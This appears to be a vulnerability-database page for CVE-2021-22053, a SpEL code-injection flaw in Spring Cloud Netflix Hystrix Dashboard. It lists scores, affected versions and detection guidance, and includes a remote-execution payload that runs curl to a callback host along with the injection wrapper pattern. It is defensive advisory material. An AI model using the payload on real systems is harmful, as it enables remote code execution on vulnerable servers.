cbcvebase.
CVE-2021-22053
published 2021-11-19

CVE-2021-22053: Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request…

PriorityP182high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
12.69%
95.8th percentile
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.

Affected

2 ranges
VendorProductVersion rangeFixed in
vmwarespring_cloud_netflix
vmwarespring_cloud_netflix>= 2.2.0 < 2.2.102.2.10

Detection & IOCsextracted from sources · hover to see the quote

url/hystrix/monitor;[user-provided data]
commandT(java.lang.Runtime).getRuntime().exec("curl http://{{interactsh-url}}")
  • Detect HTTP GET requests targeting the /hystrix/ path with semicolon-delimited path parameters containing SpringEL expression syntax (e.g., __${...}__::.x/), which is the exploitation pattern for CVE-2021-22053.
  • Monitor for out-of-band HTTP callbacks (e.g., via interactsh/canary tokens) triggered by curl or CertUtil user-agents, as the PoC payload exfiltrates via DNS/HTTP interaction.
  • Flag requests where the URI path contains the pattern `;a=a/__${` followed by `}__::.x/` as this is the specific SpEL injection wrapper used in exploitation of this CVE.
  • ·Exploitation requires BOTH spring-cloud-netflix-hystrix-dashboard AND spring-boot-starter-thymeleaf to be present in the application; neither alone is sufficient.
  • ·The vulnerability affects Spring Cloud Netflix Hystrix Dashboard versions prior to 2.2.10 only; patched versions are not susceptible.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.